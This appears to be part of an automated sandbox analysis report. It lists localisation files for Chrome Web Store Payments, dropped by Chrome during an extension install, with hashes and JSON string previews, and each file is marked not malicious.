Entropy (8bit):	4.5231229502550745
Encrypted:	false
SSDEEP:
MD5:	57AF5B654270A945BDA8053A83353A06
SHA1:	EEEF7A4F869F97CF471A05D345E74F982D15E167
SHA-256:	EC002ED92359F67818B49455DFC579E140368E6A004080AF022FD4F57F6B03F2
SHA-512:	5F0AE839FCF3F4EA48FF41A76655AE0F3821564AFD5D42FBB9FBB9A38E8D8F7BB5E9B6F71064588CD441261F644095A44A755C134CE546D506D9A21E488BAF52
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "app_name": {.. "message": "Mga Pagbabayad sa Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Kasalukuyang hindi available ang app.".. },.. "craw_connect_to_network": {.. "message": "Mangyaring kumonekta sa isang network.".. },.. "iap_unavailable": {.. "message": "Kasalukuyang hindi available ang Mga Pagbabayad na In-App.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Mangyaring mag-sign in sa Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\fr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	677
Entropy (8bit):	4.552569602149629
Encrypted:	false
SSDEEP:
MD5:	8D11C90F44A6585B57B933AB38D1FFF8
SHA1:	3F9D44EA8807069A32AACA2AAAD02FD892E6CC90
SHA-256:	599491F8C52B945C16C441ADF45BFD45AFAE046DA07757D97C56AF4DE75ED3B5
SHA-512:	D7EF7F5AD7EF1A1595825D79B69E2B1E988AD3CF1F3881496FCCD30F241E4E9C6E457F9F5D0F855DE3536DB7A40C3E1C55946B50D3F556F4A35285066A0CD6F7
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "app_name": {.. "message": "Paiements via le Chrome.Web.Store".. },.. "craw_app_unavailable": {.. "message": "Application indisponible pour le moment.".. },.. "craw_connect_to_network": {.. "message": "Veuillez vous connecter . un r.seau.".. },.. "iap_unavailable": {.. "message": "Les paiements via l'application ne sont pas disponibles pour le moment.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Veuillez vous connecter . Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\hi\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	835
Entropy (8bit):	4.791154467711985
Encrypted:	false
SSDEEP:
MD5:	E376D757C8FD66AC70A7D2D49760B94E
SHA1:	1525C5B1312D409604F097768503298EC440CC4D
SHA-256:	8106D98C4F8DA16DB698444409558E29CC96735E188BFA303C333A5D99231C1D
SHA-512:	673F3F259AF2946E4F49BBED14A2A70D44BF9FDA9D7A71DC9172BA9B7B3C7F7062B16D29682B638D485B0520ED6F99E7A735F28C7C719B539559005B69FA7555
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome ... ..... ......".. },.. "app_name": {.. "message": "Chrome ... ..... ......".. },.. "craw_app_unavailable": {.. "message": "......... .. ... ...... .... ...".. },.. "craw_connect_to_network": {.. "message": "..... ....... .. ...... .....".. },.. "iap_unavailable": {.. "message": "..-.. ...... ... ...... .... ...".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "..... Chrome ... .... .. .....".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\hr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	618
Entropy (8bit):	4.56999230891419
Encrypted:	false
SSDEEP:
MD5:	8185D0490C86363602A137F9A261CC50
SHA1:	5BD933B874441CEACB9201CCC941FF67BAED6DC0
SHA-256:	A2B2EC359A9DD9DCCCE02859CE1E738BD30FAA4A05F1DC522893FFDF722BBC15
SHA-512:	D7629978FC031EA5F716F9C1065FB2FEAB48C15F10CD68830DC966FA1002C03DDC7ACDE314C7D075F9F3A0A68552A6ACBCCDEE24CF20B6C3DD1BCE6562D0396E
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "app_name": {.. "message": "Pla.anja u web-trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenuta.no nije dostupna.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se s mre.om.".. },.. "iap_unavailable": {.. "message": "Pla.anje u aplikaciji trenuta.no nije dostupno.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se na Chrome.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\hu\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	683
Entropy (8bit):	4.675370843321512
Encrypted:	false
SSDEEP:
MD5:	85609CF8623582A8376C206556ED2131
SHA1:	1E16EB70DB5E59BB684866FF3E3925C2DEF25A12
SHA-256:	32A249749F12ADB6A220BF9ADC272C7E5D9AD5497A38B0086D961E3ABA17FBC6
SHA-512:	27883430865D3CFA6EDFE8C6CE1442BD96150B5CE520CCF7D556A330CAA6392C712B47BD86F7350E174876BC681F6DEC94D1312402655B0AF90883A2899EC78B
Malicious:	false
Reputation:	unknown
Preview:	{.. "app_description": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "app_name": {.. "message": "Chrome Internetes .ruh.z Fizet.si rendszere".. },.. "craw_app_unavailable": {.. "message": "Az alkalmaz.s jelenleg nem .rhet. el.".. },.. "craw_connect_to_network": {.. "message": "K.rj.k, csatlakozzon egy h.l.zathoz.".. },.. "iap_unavailable": {.. "message": "Az alkalmaz.son bel.li fizet.s jelenleg nem .rhet. el.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Jelentkezzen be a Chrome-ba.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\id\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	empty
Category:	modified
Size (bytes):	0
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:
MD5:	D41D8CD98F00B204E9800998ECF8427E
SHA1:	DA39A3EE5E6B4B0D3255BFEF95601890AFD80709
SHA-256:	E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855
SHA-512:	CF83E1357EEFB8BDF1542850D66D8007D620E4050B5715DC83F4A921D36CE9CE47D0D13C5D85F2B0FF8318D2877EEC2F63B931BD47417A81A538327AF927DA3E
Malicious:	false
Reputation:	unknown
Preview:

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\it\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	464
Entropy (8bit):	4.701550173628233
Encrypted:	false
SSDEEP:
MD5:	BB9C32BA62DDA02F9471C64B5F9CF916
SHA1:	9825037D5D9185C58456CDD887C77B10A41D8C84
SHA-256:	43A0B113D3773BA78F82BB9E42DDC46F6892D0FBBB351F94A7C105E4A146E9C1
SHA-512:	4D3DB91A6251F2DD9CBF97D29805A7AC23F49988966E9B686D486B4A8CEBEA33F5502E3891D5231674061127C282C745FB87FDA7467A6172851BF6925506C8CA
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"App al momento non disponibile."},"craw_connect_to_network":{"message":"Collegati a una rete."},"app_name":{"message":"Pagamenti Chrome Web Store"},"app_description":{"message":"Pagamenti Chrome Web Store"},"iap_unavailable":{"message":"La funzione Pagamenti In-App non \u00e8 al momento disponibile."},"please_sign_in":{"message":"Accedi a Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\ja\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.671841695172103
Encrypted:	false
SSDEEP:
MD5:	96C8CBD161D3CE9CB1A46CB2CD0C6583
SHA1:	78BBFCF035B5B620E353C8E520653ADD3F4E7DB8
SHA-256:	81D8F1D9F72B3139BC5D9845BCF82990308FB6175D07514D8238B1E6D5D02E8A
SHA-512:	692468B7B44D961D8248BBC30CC11DE9F3F7E89D01A609E6CB71CAF653D8212C15DFA834C5FB6E8261FD21A25E9616861C0A3FC01DB27CBBE79C3FDE2C6549DD
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u30a2\u30d7\u30ea\u306f\u73fe\u5728\u3054\u5229\u7528\u3044\u305f\u3060\u3051\u307e\u305b\u3093\u3002"},"craw_connect_to_network":{"message":"\u30cd\u30c3\u30c8\u30ef\u30fc\u30af\u306b\u63a5\u7d9a\u3057\u3066\u304f\u3060\u3055\u3044\u3002"},"app_name":{"message":"Chrome \u30a6\u30a7\u30d6\u30b9\u30c8\u30a2\u6c7a\u6e08"},"app_description":{"message":"Chrome \u30a6\u30a7\u30d6\u30b9\u30c8\u30a2\u6c7a\u6e08"},"iap_unavailable":{"message":"\u30a2\u30d7\u30ea\u5185\u30da\u30a4\u30e1\u30f3\u30c8\u306f\u73fe\u5728\u3054\u5229\u7528\u3044\u305f\u3060\u3051\u307e\u305b\u3093\u3002"},"please_sign_in":{"message":"Chrome \u306b\u30ed\u30b0\u30a4\u30f3\u3057\u3066\u304f\u3060\u3055\u3044\u3002"},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\ko\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	656
Entropy (8bit):	4.88216622785951
Encrypted:	false
SSDEEP:
MD5:	3CAF23A8EA2332D78B725B6C99EC3202
SHA1:	95C3504F55A929449EF2E3AB92014562AACD39AD
SHA-256:	BFE72BBC492B9018A599CB6575366696E431E6A38400E4B2ED06EAE3340D3AE5
SHA-512:	C000FCCB567D3590D4C401005E78C539961455BB13686296EC4FF7018BB0A4DAB2DA96FBDAA33D999C1409B5796932370219B3FF8490B671586DEBD6145519D6
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\ud604\uc7ac \uc571\uc744 \uc0ac\uc6a9\ud560 \uc218 \uc5c6\uc2b5\ub2c8\ub2e4."},"craw_connect_to_network":{"message":"\ub124\ud2b8\uc6cc\ud06c\uc5d0 \uc5f0\uacb0\ud558\uc138\uc694."},"app_name":{"message":"Chrome \uc6f9 \uc2a4\ud1a0\uc5b4 \uacb0\uc81c"},"app_description":{"message":"Chrome \uc6f9 \uc2a4\ud1a0\uc5b4 \uacb0\uc81c"},"iap_unavailable":{"message":"\ud604\uc7ac \uc778\uc571 \uacb0\uc81c\ub97c \uc0ac\uc6a9\ud560 \uc218 \uc5c6\uc2b5\ub2c8\ub2e4."},"please_sign_in":{"message":"Chrome\uc5d0 \ub85c\uadf8\uc778\ud558\uc138\uc694."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\lt\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	576
Entropy (8bit):	4.846810495221701
Encrypted:	false
SSDEEP:
MD5:	41F2D63952202E528DBBB683B480F99C
SHA1:	9DD998542DBE6609299D4A5A25364A32FA7D7865
SHA-256:	FF7C083CD1E6134DD8263C634336EB852274BAD1BFAD18762814C42BC65309D8
SHA-512:	7BD2E2D4264C6BD62DF2584F3C1D3A910C5C5A28F4532F1E8F0C2235E93714EDD6074EA24960D4DEB4F9125DA81CA813F06330EFF66FA8DF1552D1DAC686441E
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Programa \u0161iuo metu negalima."},"craw_connect_to_network":{"message":"Prisijunkite prie tinklo."},"app_name":{"message":"\u201eChrome\u201c internetin\u0117s parduotuv\u0117s mok\u0117jimo sistema"},"app_description":{"message":"\u201eChrome\u201c internetin\u0117s parduotuv\u0117s mok\u0117jimo sistema"},"iap_unavailable":{"message":"Mok\u0117jimai programoje \u0161iuo metu negalimi."},"please_sign_in":{"message":"Prisijunkite prie \u201eChrome\u201c."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\lv\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	584
Entropy (8bit):	4.856464171821628
Encrypted:	false
SSDEEP:
MD5:	1D21ED2D46338636E24401F6E56E326F
SHA1:	24497EDB25724BC4A57823C5CD06F50DB9647DD4
SHA-256:	434A375C32B8A21C435511C551F740FD4D170EC528A8F4EFC3D798EA4A07B606
SHA-512:	10A870718CC6281EE09DE01900D303B06589D9281C5849D6105C6FCF58BFFA3855F29C6ECA3689FFE6EF304BABCF41C5700EE2D8AFE711D57CB711194366FA6A
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Lietotne pagaid\u0101m nav pieejama."},"craw_connect_to_network":{"message":"L\u016bdzu, izveidojiet savienojumu ar t\u012bklu."},"app_name":{"message":"Chrome interneta veikala maks\u0101jumu sist\u0113ma"},"app_description":{"message":"Chrome interneta veikala maks\u0101jumu sist\u0113ma"},"iap_unavailable":{"message":"Maks\u0101jumi lietotn\u0113s pa\u0161laik nav pieejami."},"please_sign_in":{"message":"L\u016bdzu, pierakstieties p\u0101rl\u016bk\u0101 Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\nb\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	501
Entropy (8bit):	4.804937629013952
Encrypted:	false
SSDEEP:
MD5:	8F0168B9A546D5A99FD8A262C975C80E
SHA1:	B0718071BD0B7251D4459E9C87DF50C14622FBD6
SHA-256:	F03FA7384DF79EBA6E0274D570996030F595A3BF6B781929DD9DB6593262E41F
SHA-512:	A1191CDC496DDD7470BDCFAF186BB9488767159E0CA6A6242D195FA3351704DC8F8BBD03DBEE57D37BBD897C9E8D14B7325FB37D58AC80DEC0F972FF893758B8
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Appen er utilgjengelig for \u00f8yeblikket."},"craw_connect_to_network":{"message":"Du m\u00e5 koble til et nettverk."},"app_name":{"message":"Chrome Nettmarked-betalinger"},"app_description":{"message":"Chrome Nettmarked-betalinger"},"iap_unavailable":{"message":"Betaling i app er ikke tilgjengelig for \u00f8yeblikket."},"please_sign_in":{"message":"Du m\u00e5 logge p\u00e5 Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\nl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	472
Entropy (8bit):	4.651254944398292
Encrypted:	false
SSDEEP:
MD5:	E7F74DCE7B6411E4E0D95E9252CF74FA
SHA1:	33CC6C73C5F8D0144C0260C2E5A9BD0DB3EF6477
SHA-256:	3564AEF46C01602B19CC29FD8A79676C543427EDE98206D0C91B33AF0CCF3977
SHA-512:	B0987002F8BC4F0B0AC41A87E90BA729464BF2F34D1CC413DD3837019F5F37FD46EB9E9FDABB97F5BDCB50768ABF808AF6E7C531CD7BCA477C71990D2F13335B
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"App momenteel niet beschikbaar."},"craw_connect_to_network":{"message":"Maak verbinding met een netwerk."},"app_name":{"message":"Betalingen via Chrome Web Store"},"app_description":{"message":"Betalingen via Chrome Web Store"},"iap_unavailable":{"message":"In-app-betalingen is momenteel niet beschikbaar."},"please_sign_in":{"message":"Log in bij Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\pl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	549
Entropy (8bit):	4.978056737225237
Encrypted:	false
SSDEEP:
MD5:	E16649D87E4CA6462192CF78EBE543EC
SHA1:	53097D592B13F3C1370366B25024EA72208B136A
SHA-256:	EB435F7460A63576CA1ECB51948E7A3AD5168D2F175AE2B5836D469672923D84
SHA-512:	6EC702CEC6E312CAC6F33109A57F7D83A3F073F2F9A9BD42DB0F91A36F87D800EEB978C69023B6A0E00B86ECE3E1024C269F89D038F0926619F40D075F6689DD
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplikacja jest obecnie niedost\u0119pna."},"craw_connect_to_network":{"message":"Po\u0142\u0105cz si\u0119 z sieci\u0105."},"app_name":{"message":"P\u0142atno\u015bci w sklepie Chrome Web Store"},"app_description":{"message":"P\u0142atno\u015bci w sklepie Chrome Web Store"},"iap_unavailable":{"message":"P\u0142atno\u015bci w ramach aplikacji s\u0105 teraz niedost\u0119pne."},"please_sign_in":{"message":"Zaloguj si\u0119 w Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\pt_BR\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	513
Entropy (8bit):	4.734605177119403
Encrypted:	false
SSDEEP:
MD5:	1F4BC8A5EFD59D61127ABEECD4B6CAE3
SHA1:	8647B4D2D643AE4F784ABDDC50D87A39AD02971A
SHA-256:	E1950CBBF056F068EA56160DDB318F3E6232BFBBE096D221C7CA6FCAACE2A8B9
SHA-512:	B58A95BBBC0A16B06826684198B481D2E15A7C760956721C3B538C62C902873A7856F328506457EE66311E45D7A16A4AAAC85B12853AA7EF09780189D28EB3DE
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplicativo indispon\u00edvel no momento."},"craw_connect_to_network":{"message":"Conecte-se a uma rede."},"app_name":{"message":"Pagamentos da Chrome Web Store"},"app_description":{"message":"Pagamentos da Chrome Web Store"},"iap_unavailable":{"message":"No momento, os Pagamentos no aplicativo n\u00e3o est\u00e3o dispon\u00edveis."},"please_sign_in":{"message":"Fa\u00e7a login no Google Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\pt_PT\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	503
Entropy (8bit):	4.742240430473613
Encrypted:	false
SSDEEP:
MD5:	D80ECE7E4B3741CD9CD29B89D006B864
SHA1:	8F0D587B78E36861ED00524ABF886FA20E14CAE4
SHA-256:	C8FF9ACAEA1D3B6F8483339CB40F66BC563CCA8DD87F2337F813C492B20F451B
SHA-512:	8A53D9618BBD1A62CD48501E5620932631C1B045612082D99429628D2BF4409AEE3FA695107E82037B5CB332111C456CF3A74235C66B61380CF1E382914F1088
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplica\u00e7\u00e3o atualmente indispon\u00edvel."},"craw_connect_to_network":{"message":"Ligue-se a uma rede."},"app_name":{"message":"Pagamentos via Chrome Web Store"},"app_description":{"message":"Pagamentos via Chrome Web Store"},"iap_unavailable":{"message":"Os Pagamentos na app est\u00e3o atualmente indispon\u00edveis."},"please_sign_in":{"message":"Inicie sess\u00e3o no Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\ro\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	554
Entropy (8bit):	4.8596885592394505
Encrypted:	false
SSDEEP:
MD5:	D63E66B94A4EA2085D80E76209582FB1
SHA1:	4ECAC3EB64DD6253310A0776E6D42257FC290D77
SHA-256:	91A5AAD210C3E0241106E8821B3897EDEFEC9D85033C94DB2324FF3A5FDE5AC7
SHA-512:	09AC34CF286FD0730EED4F6DB3E2FD00A026D0F42DCC75AE49B045DDAD38DFA38B0FB7823ECAC8B0A9BC2A89F4EAF4BCE081779F2ECDF6CC39286045577DC5C9
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u00cen prezent, aplica\u021bia nu este disponibil\u0103."},"craw_connect_to_network":{"message":"Conecteaz\u0103-te la o re\u021bea."},"app_name":{"message":"Pl\u0103\u021bi prin Magazinul web Chrome"},"app_description":{"message":"Pl\u0103\u021bi prin Magazinul web Chrome"},"iap_unavailable":{"message":"Pl\u0103\u021bile \u00een aplica\u021bie nu sunt disponibile momentan."},"please_sign_in":{"message":"Conecteaz\u0103-te la Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\ru\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1165
Entropy (8bit):	4.224419823550506
Encrypted:	false
SSDEEP:
MD5:	22F9E62ABAD82C2190A839851245A495
SHA1:	E7F79BD875918F0D0799DB5F45FAC6297FB66AF7
SHA-256:	9FC1167626C97BCBFDAFF23C6033A44252F89A501AF1DF41C43CB3A994FEB09F
SHA-512:	F577F2F0C344C4E4050AF025A9FB9AC78CADF7FE177F63AB9863826A9808B7FBF5D3363E3B61D7A6DB083EF5EBAC5474D710347B701640AB9C229A3E5D1F0A48
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u041f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e."},"craw_connect_to_network":{"message":"\u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0442\u0435\u0441\u044c \u043a \u0441\u0435\u0442\u0438."},"app_name":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 Chrome"},"app_description":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u043d\u0430\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u0418\u043d\u0442\u0435\u0440\u043d\u0435\u0442-\u043c\u0430\u0433\u0430\u0437\u0438\u043d\u0430 Chrome"},"iap_unavailable":{"message":"\u041f\u043b\u0430\u0442\u0435\u0436\u0438 \u0447\u0435\u0440\u0435\u0437 \u043f\u0440\u0438\u043b\u043e\u0436\u0435\u043d\u0438\u044f \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u044b."},"

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\sk\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	548
Entropy (8bit):	4.850036636276313
Encrypted:	false
SSDEEP:
MD5:	4BBAA10FD00AADBBA3EF6E805E8E1A62
SHA1:	1991901BD6A20C4A7977F09DF30C0CFF0524C504
SHA-256:	906C4F7FDDE15DE4C841E7910BBF14D9175E894BCB244B56E8447A5ADFA5B7AB
SHA-512:	3490F8826E3DB0C8B4FE7B1866DA27F6585ADF52E74392A592A60A916E8A784FF7B92B3DE8985084546D663588369D9BB03FCB25196B7F9C6DF607BEB7DEF010
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplik\u00e1cia moment\u00e1lne nie je dostupn\u00e1."},"craw_connect_to_network":{"message":"Pripojte sa k sieti."},"app_name":{"message":"Platby Internetov\u00e9ho obchodu Chrome"},"app_description":{"message":"Platby Internetov\u00e9ho obchodu Chrome"},"iap_unavailable":{"message":"Platby v aplik\u00e1cii moment\u00e1lne nie s\u00fa k dispoz\u00edcii."},"please_sign_in":{"message":"Prihl\u00e1ste sa do prehliada\u010da Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\sl\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	494
Entropy (8bit):	4.7695148367588285
Encrypted:	false
SSDEEP:
MD5:	F45DE58765A37FD095319D7DEB0F2FB6
SHA1:	B585A485C9BC1982EDF7AE0B9AC73A8E91D41CB5
SHA-256:	8366774AA582035BC7D949F4E28FAEC371C305D01404DF56FFF5A78B4F6ECDB7
SHA-512:	F86334E6E6F90961AD9C8E7DD1A4E923476249469180AC69D9DE59746FE26FAECB585898FC50310380F20CEB0971CA1EB7B55046DA75276840AEA6BAFF574E66
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"Aplikacija trenutno ni na voljo."},"craw_connect_to_network":{"message":"Pove\u017eite se z omre\u017ejem."},"app_name":{"message":"Pla\u010dila v spletni trgovini Chrome"},"app_description":{"message":"Pla\u010dila v spletni trgovini Chrome"},"iap_unavailable":{"message":"Pla\u010dila v aplikacijah trenutno niso na voljo."},"please_sign_in":{"message":"Prijavite se v Chrome."},"jwt_retrieve_failed":{"message":"The transaction could not be completed."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\sr\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	1152
Entropy (8bit):	4.2078334514915685
Encrypted:	false
SSDEEP:
MD5:	92C1FAC62EB7F92EC3794D4A141BEF32
SHA1:	2AFA41BF51BF9A1089B0B92A9D2DC74299B79813
SHA-256:	9DF154C93B02695AF1CC39F085D9D178EC6AF131A62C2AFC65F125F8F9A5B7AC
SHA-512:	D0709E4F586EAC03548A47D72156CF48D9B4EB9AF9ED8335DF75F541AE1B4172541647EC8BA081965647A9EAE10DB342F87558977BE6075B2D3CC5C3995ED6EE
Malicious:	false
Reputation:	unknown
Preview:	{"craw_app_unavailable":{"message":"\u0410\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0458\u0430 \u0458\u0435 \u0442\u0440\u0435\u043d\u0443\u0442\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430."},"craw_connect_to_network":{"message":"\u041f\u043e\u0432\u0435\u0436\u0438\u0442\u0435 \u0441\u0430 \u043c\u0440\u0435\u0436\u043e\u043c."},"app_name":{"message":"\u041f\u043b\u0430\u045b\u0430\u045a\u0430 \u0443 Chrome \u0432\u0435\u0431-\u043f\u0440\u043e\u0434\u0430\u0432\u043d\u0438\u0446\u0438"},"app_description":{"message":"\u041f\u043b\u0430\u045b\u0430\u045a\u0430 \u0443 Chrome \u0432\u0435\u0431-\u043f\u0440\u043e\u0434\u0430\u0432\u043d\u0438\u0446\u0438"},"iap_unavailable":{"message":"\u041f\u043b\u0430\u045b\u0430\u045a\u0430 \u0443 \u0430\u043f\u043b\u0438\u043a\u0430\u0446\u0438\u0458\u0438 \u0441\u0443 \u0442\u0440\u0435\u043d\u0443\u0442\u043d\u043e \u043d\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u0430."},"please_sign_in":{"message":"\u041f\u04

C:\Users\user\AppData\Local\Temp\scoped_dir4872_1835717667\CRX_INSTALL\_locales\sv\messages.json

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines
Category:	dropped
Size (bytes):	523
Entropy (8bit):	4.788896709100935
Encrypted:	false
SSDEEP:
MD5:	6E1BE9CEE29818E54E3D1C7D483DD6F7
SHA1:	B9DD926B60E225C5BE8A1DBB7EF3ACE422A204A9
SHA-256:	E348583D8C53F4A5DEC4551DA93785C17108466E427E06F84708AA383EA0E326
SHA-512:	3ADB32C0F098E064B774E7E7F615F54C44ADFB3BFC554B06A17048C6077C5885D42BD89F6733D64D65EA1785033B36B386EF0B6661FD539855484EA5A2900BB7
Malicious:	false
Reputation:	unknown
